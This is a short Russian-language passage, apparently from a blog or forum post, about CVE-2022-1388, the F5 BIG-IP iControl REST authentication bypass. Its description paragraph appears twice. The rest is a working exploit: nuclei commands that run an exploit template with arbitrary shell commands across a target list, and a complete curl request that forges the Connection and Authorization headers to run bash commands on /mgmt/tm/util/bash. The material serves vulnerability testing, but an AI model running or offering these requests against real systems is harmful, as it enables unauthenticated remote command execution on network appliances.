
CVE-2022-1388 — это уязвимость обхода аутентификации в компоненте REST API iControl BIG-IP, которой присвоен балл CVSSv3 9.8. REST API iControl используется для управления и настройки устройств BIG-IP. CVE-2022-1388 может быть использована неаутентифицированным атакующим, имеющим сетевой доступ к порту управления или собственным IP-адресам устройств, использующих BIG-IP. Эксплуатация позволила бы атакующему выполнять произвольные системные команды, создавать и удалять файлы и отключать службы.
CVE-2022-1388 — это уязвимость обхода аутентификации в компоненте REST API iControl в BIG-IP, которой был присвоен показатель CVSSv3 9.8. REST API iControl используется для управления и настройки устройств BIG-IP. CVE-2022-1388 может быть использована неаутентифицированным злоумышленником, имеющим сетевой доступ к управляющему порту или собственным IP-адресам устройств, использующих BIG-IP. Эксплуатация позволяет злоумышленнику выполнять произвольные системные команды, создавать и удалять файлы, а также отключать службы.
Этот шаблон nuclei принимает параметр оболочки для эксплуатации. Мы хотели протестировать токены, полученные из другого рабочего процесса или ручного поиска, поэтому мы использовали функцию переменной CLI nuclei для динамической передачи одного значения токена или списка токенов в эти шаблоны во время выполнения.
-V, -var value пользовательские переменные в формате var=value
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=commands.txt
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=uname -a

curl -su admin \
-H "Host: localhost:8100" \
-H "Content-Type: application/json" \
-H "Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: a" \
-H "Authorization: Basic YWRtaW46" \
http://{{TARGET_IP}}/mgmt/tm/util/bash \
-d '{"command":"run","utilCmdArgs":"-c id"}'